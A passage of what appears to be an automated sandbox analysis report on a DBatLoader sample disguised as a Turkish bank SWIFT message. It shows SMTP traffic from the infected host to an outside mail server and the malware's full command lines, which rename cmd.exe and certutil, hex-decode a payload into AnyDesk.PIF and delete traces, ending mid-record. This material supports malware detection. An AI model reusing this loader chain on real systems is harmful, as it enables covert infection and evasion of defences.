                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:39.239582062 CET5874985951.195.88.199192.168.2.10220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Mon, 18 Nov 2024 08:57:39 +0000
                                                                                                                                                                                                                                                                                                                                                                                                                                        220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                                                                                                                                                                                                                                                                                                        220 and/or bulk e-mail.
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:39.277879953 CET49859587192.168.2.1051.195.88.199EHLO 910646
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:39.518970013 CET5874985951.195.88.199192.168.2.10250-s82.gocheapweb.com Hello 910646 [155.94.241.187]
                                                                                                                                                                                                                                                                                                                                                                                                                                        250-SIZE 52428800
                                                                                                                                                                                                                                                                                                                                                                                                                                        250-8BITMIME
                                                                                                                                                                                                                                                                                                                                                                                                                                        250-PIPELINING
                                                                                                                                                                                                                                                                                                                                                                                                                                        250-PIPECONNECT
                                                                                                                                                                                                                                                                                                                                                                                                                                        250-STARTTLS
                                                                                                                                                                                                                                                                                                                                                                                                                                        250 HELP
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:39.524532080 CET49859587192.168.2.1051.195.88.199STARTTLS
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:39.770153999 CET5874985951.195.88.199192.168.2.10220 TLS go ahead
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:44.148226023 CET5874988451.195.88.199192.168.2.10220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Mon, 18 Nov 2024 08:57:44 +0000
                                                                                                                                                                                                                                                                                                                                                                                                                                        220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                                                                                                                                                                                                                                                                                                        220 and/or bulk e-mail.
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:44.148412943 CET49884587192.168.2.1051.195.88.199EHLO 910646
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:44.390292883 CET5874988451.195.88.199192.168.2.10250-s82.gocheapweb.com Hello 910646 [155.94.241.187]
                                                                                                                                                                                                                                                                                                                                                                                                                                        250-SIZE 52428800
                                                                                                                                                                                                                                                                                                                                                                                                                                        250-8BITMIME
                                                                                                                                                                                                                                                                                                                                                                                                                                        250-PIPELINING
                                                                                                                                                                                                                                                                                                                                                                                                                                        250-PIPECONNECT
                                                                                                                                                                                                                                                                                                                                                                                                                                        250-STARTTLS
                                                                                                                                                                                                                                                                                                                                                                                                                                        250 HELP
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:44.390511036 CET49884587192.168.2.1051.195.88.199STARTTLS
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:44.632435083 CET5874988451.195.88.199192.168.2.10220 TLS go ahead
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:59.298537970 CET5874996151.195.88.199192.168.2.10220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Mon, 18 Nov 2024 08:57:59 +0000
                                                                                                                                                                                                                                                                                                                                                                                                                                        220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                                                                                                                                                                                                                                                                                                        220 and/or bulk e-mail.
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:59.304847956 CET49961587192.168.2.1051.195.88.199EHLO 910646
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:59.545109034 CET5874996151.195.88.199192.168.2.10250-s82.gocheapweb.com Hello 910646 [155.94.241.187]
                                                                                                                                                                                                                                                                                                                                                                                                                                        250-SIZE 52428800
                                                                                                                                                                                                                                                                                                                                                                                                                                        250-8BITMIME
                                                                                                                                                                                                                                                                                                                                                                                                                                        250-PIPELINING
                                                                                                                                                                                                                                                                                                                                                                                                                                        250-PIPECONNECT
                                                                                                                                                                                                                                                                                                                                                                                                                                        250-STARTTLS
                                                                                                                                                                                                                                                                                                                                                                                                                                        250 HELP
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:59.545281887 CET49961587192.168.2.1051.195.88.199STARTTLS
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:59.786170006 CET5874996151.195.88.199192.168.2.10220 TLS go ahead
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:03.455595016 CET5874998451.195.88.199192.168.2.10220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Mon, 18 Nov 2024 08:58:03 +0000
                                                                                                                                                                                                                                                                                                                                                                                                                                        220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                                                                                                                                                                                                                                                                                                        220 and/or bulk e-mail.
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:03.455899954 CET49984587192.168.2.1051.195.88.199EHLO 910646
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:03.699121952 CET5874998451.195.88.199192.168.2.10250-s82.gocheapweb.com Hello 910646 [155.94.241.187]
                                                                                                                                                                                                                                                                                                                                                                                                                                        250-SIZE 52428800
                                                                                                                                                                                                                                                                                                                                                                                                                                        250-8BITMIME
                                                                                                                                                                                                                                                                                                                                                                                                                                        250-PIPELINING
                                                                                                                                                                                                                                                                                                                                                                                                                                        250-PIPECONNECT
                                                                                                                                                                                                                                                                                                                                                                                                                                        250-STARTTLS
                                                                                                                                                                                                                                                                                                                                                                                                                                        250 HELP
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:03.699523926 CET49984587192.168.2.1051.195.88.199STARTTLS
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:03.943224907 CET5874998451.195.88.199192.168.2.10220 TLS go ahead

                                                                                                                                                                                                                                                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                                                                                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                                                                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                                                                                                                                                                        Behavior

                                                                                                                                                                                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:57:08
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd" "
                                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff62a990000
                                                                                                                                                                                                                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:57:09
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                                                                                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:8
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:57:09
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\extrac32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff7ada70000
                                                                                                                                                                                                                                                                                                                                                                                                                                        File size:35'328 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:41330D97BF17D07CD4308264F3032547
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:57:09
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Users\Public\alpha.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff706eb0000
                                                                                                                                                                                                                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:57:09
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\extrac32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff7ada70000
                                                                                                                                                                                                                                                                                                                                                                                                                                        File size:35'328 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:41330D97BF17D07CD4308264F3032547
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:57:10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Users\Public\alpha.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9
                                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff706eb0000
                                                                                                                                                                                                                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:57:10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Users\Public\kn.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9
                                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff627a40000
                                                                                                                                                                                                                                                                                                                                                                                                                                        File size:1'651'712 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:13
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:57:11
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Users\Public\alpha.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
                                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff706eb0000
                                                                                                                                                                                                                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:14
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:57:11
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Users\Public\kn.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
                                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff627a40000
                                                                                                                                                                                                                                                                                                                                                                                                                                        File size:1'651'712 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:15
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:57:12
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Users\Public\Libraries\AnyDesk.PIF
                                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Users\Public\Libraries\AnyDesk.PIF
                                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                                                                                        File size:1'239'552 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:E02910D2D83F40FAEF8719A99EE0EF5B
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:Borland Delphi
                                                                                                                                                                                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000F.00000003.1311463700.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000F.00000003.1311999021.000000007F920000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:16
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:57:12
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Users\Public\alpha.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
                                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff706eb0000
                                                                                                                                                                                                                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:17
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:57:12
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Users\Public\alpha.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S
                                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff706eb0000
                                                                                                                                                                                                                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:19
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:57:22
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\aymtmquJ.cmd" "
                                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0xd70000
                                                                                                                                                                                                                                                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:20
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:57:22
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                                                                                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:21
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:57:23
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x3b0000
                                                                                                                                                                                                                                                                                                                                                                                                                                        File size:352'768 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:22
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:57:23
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x3b0000
                                                                                                                                                                                                                                                                                                                                                                                                                                        File size:352'768 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:23
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:57:24
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\\Windows\\System32\\esentutl.exe /y C:\Users\Public\Libraries\AnyDesk.PIF /d C:\\Users\\Public\\Libraries\\Juqmtmya.PIF /o
                                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x3b0000
                                                                                                                                                                                                                                                                                                                                                                                                                                        File size:352'768 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:24
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:57:24
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                                                                                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                                                                                                        Target ID:25
                                                                                                                                                                                                                                                                                                                                                                                                                                        Start time:03:57:24
